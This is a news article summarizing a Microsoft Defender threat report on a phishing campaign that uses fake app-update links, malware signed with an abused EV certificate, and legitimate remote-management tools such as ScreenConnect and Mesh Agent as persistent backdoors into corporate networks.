Microsoft Defender experts have presented a new threat report where they warn of new strategies in phishing attacks against business computers. Cybercriminals do not rest, they are always ahead of defense systems and once again surprise with their “audacity” and “originality.”
Phishing attacks continue to grow and, together with ransomware, are the great threat in cybersecurity. In the last three years there has been a 119% increase in these threats, which in addition to their number, stand out for the variation in malicious campaigns. The strategy here doesn’t involve breaching a highly sophisticated security system, inventing a new zero-day vulnerability, or anything that comes to mind when you hear the word “hacking.” The attackers simply devised a system, certainly ingenious, to infiltrate corporate computers using legitimate software.
Novel phishing attacks
It all starts with sending emails containing fake meeting invitations, PDF documents and other malicious links. When a targeted user clicks on a link to update a popular application such as Microsoft Teams, Zoom, Google Meet, or Adobe Reader, they are actually downloading malware to their computer.
But here’s the thing: Microsoft discovered that the malicious files were digitally signed using an abusive Extended Validation (EV) certificate issued to a company called TrustConnect Software PTY LTD.
Now, EV certificates are not easy to obtain, since they require strict identity verification by the Certification Authority. As ESET Distinguished Researcher Aryeh Goretsky noted in the comments, an EV certificate does not automatically prevent antivirus software from scanning a file, but it does give it a higher reputation score. The Proofpoint report adds that “when used by threat actors, they can help criminals evade signature-based detections”.
When a user downloads it, malware lays the foundation for the entire operation. It first copies itself to the Program Files directory to simulate a legitimate application, registers itself as a Windows service, and creates a run key in the system registry to start every time the computer is turned on. Once it takes over an infected computer, the malware uses encrypted PowerShell commands to silently install legitimate remote monitoring and management (RMM) tools such as ScreenConnect, Tactical RMM, and Mesh Agent.
Since corporate IT departments use these same tools daily to manage company computers, malicious network traffic is easily embedded. Attackers gain persistent backdoor into corporate networkwhich includes remote desktop control and the execution of commands at the system level, without raising any red flags. According to the Microsoft report, attackers even install several RMM tools, just in case a security team detects and removes one.
Once full control of the network is established, Attackers can do pretty much whatever they want with affected computers. They can breach internal servers to steal intellectual property, customer databases, or financial records. Or they can move laterally from a single infected laptop directly to the primary domain controller. The possibilities are endless.
This is a constant threat, and Microsoft recommends that companies and employees Take extreme precautions with any download of files whose security is not absolute. You can see the full report on the Microsoft security blog.
